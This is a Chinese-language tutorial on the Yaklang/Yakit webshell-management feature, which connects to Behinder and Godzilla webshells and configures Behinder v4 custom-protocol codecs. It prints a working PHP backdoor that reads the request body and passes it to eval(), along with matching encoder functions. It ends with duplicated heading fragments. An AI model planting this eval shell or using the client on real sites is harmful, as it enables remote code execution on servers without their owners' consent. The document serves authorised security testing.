Yaklang Webshell 管理功能详解<\/h1>

一、功能概述<\/h2>

Yaklang v1.3.0 版本引入了试验性的网站管理功能，主要用于管理冰蝎(Behinder)、哥斯拉(Godzilla)等类型的Webshell。该功能提供了：<\/p>

存活探测<\/li>
获取基础信息<\/li>
命令执行<\/li>

部分文件管理功能<\/li> <\/ul>

重要提示<\/strong>：使用前必须获取合法授权，仅用于管理自己拥有的网站。<\/p>

二、支持的Webshell类型<\/h2>
1. 哥斯拉(Godzilla)管理<\/h3>
连接步骤<\/strong>：<\/p>

打开Yakit的"网站管理"模块<\/li>
点击右上角"添加网站"<\/li>
填写表单字段：

URL<\/li>
脚本类型<\/li>
密码\/密钥<\/li>
其他必要参数<\/li> <\/ul> <\/li> <\/ol>
特点<\/strong>：<\/p>

连接过程相对简单<\/li>
未来可能通过加载插件扩展功能<\/li> <\/ul>
2. 冰蝎3(Behinder v3)管理<\/h3>
连接配置<\/strong>：<\/p>

URL：Webshell地址<\/li>
脚本类型：选择对应语言(如PHP、JSP等)<\/li>
密钥：与Webshell设置的密钥一致<\/li> <\/ul>
特点<\/strong>：<\/p>

默认使用AES\/XOR加解密方式<\/li>
无需选择编解码器<\/li>
连接后可进行存活检测和基本信息查看<\/li> <\/ul>
3. 冰蝎4(Behinder v4)管理<\/h3>
冰蝎4引入了自定义协议通讯，连接过程更为复杂，涉及编解码器的配置。<\/p>
三、冰蝎4自定义协议详解<\/h2>
1. 通讯流程<\/h3>

本地加密<\/strong>：加密或编码请求包(Request)<\/li>
远程解密<\/strong>：Webshell端解密或解码请求包<\/li>
远程加密<\/strong>：Webshell端加密返回结果(Response)<\/li>
本地解密<\/strong>：客户端解密返回结果<\/li> <\/ol>
2. Yakit中的编解码器概念<\/h3>
Yakit使用两种编解码器：<\/p>

数据包编解码器<\/strong>：处理HTTP请求和响应的body<\/p>

对应"本地加密"和"本地解密"<\/li> <\/ul> <\/li>

回显编解码器<\/strong>：处理Payload中的加解密函数<\/p>

对应"远程加密"和"远程解密"<\/li> <\/ul> <\/li> <\/ol>
3. 编解码器配置示例<\/h3>
数据包编解码器<\/h4>
编码器示例<\/strong>：<\/p>
wsmPacketEncoder = func(raw) { packet = "aaa" + string(raw) + "bbb" return []byte(packet) } <\/code><\/pre> 对应Webshell解码器(PHP示例)<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span>function<\/span> Decrypt<\/span>($data){ <\/span><\/span> $data =<\/span> substr<\/span>($data, 3<\/span>, strlen<\/span>($data) -<\/span> 6<\/span>); <\/span><\/span> return<\/span> $data; <\/span><\/span>} <\/span><\/span>$post =<\/span> Decrypt<\/span>(file_get_contents<\/span>("php:\/\/input"<\/span>)); <\/span><\/span>eval<\/span>($post); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>回显编解码器<\/h4> 编码器示例<\/strong>：<\/p> wsmPayloadEncoder = func(reqBody) { return `function encrypt($data){ return strrev($data);}` } <\/code><\/pre> 解码器示例<\/strong>：<\/p> wsmPayloadDecoder = func(reqBody) { return string(reqBody).Reverse() } <\/code><\/pre> 4. 连接冰蝎4的步骤<\/h3> 编写或选择数据包编解码器<\/li> 编写或选择回显编解码器<\/li> 在添加网站表单中：填写URL<\/li> 选择脚本类型<\/li> 选择配置好的编解码器<\/li> 密钥可随意填写(因为加解密已由编解码器处理)<\/li> <\/ul> <\/li> 连接后可进行代理监控，观察数据包<\/li> <\/ol> 四、功能展望<\/h2> 可能采用YAML profile方式进行配置管理<\/li> 计划将功能导出为yaklang库，便于代码中调用<\/li> 持续完善网站管理模块功能<\/li> <\/ol> 五、技术学习建议<\/h2> 建议深入研究冰蝎、哥斯拉的服务端实现，这些实现包含了许多值得学习的安全技术。可以通过它们的源码进行学习。<\/p> 注意<\/strong>：本文仅介绍如何连接相关Webshell，实际应用中请确保遵守法律法规，仅用于合法授权的安全测试。<\/p>

Yaklang Webshell 管理功能详解<\/h1>

3. 冰蝎4(Behinder v4)管理<\/h3> 冰蝎4引入了自定义协议通讯，连接过程更为复杂，涉及编解码器的配置。<\/p>

三、冰蝎4自定义协议详解<\/h2>

3. 编解码器配置示例<\/h3>

3. 冰蝎4(Behinder v4)管理<\/h3>
冰蝎4引入了自定义协议通讯，连接过程更为复杂，涉及编解码器的配置。<\/p>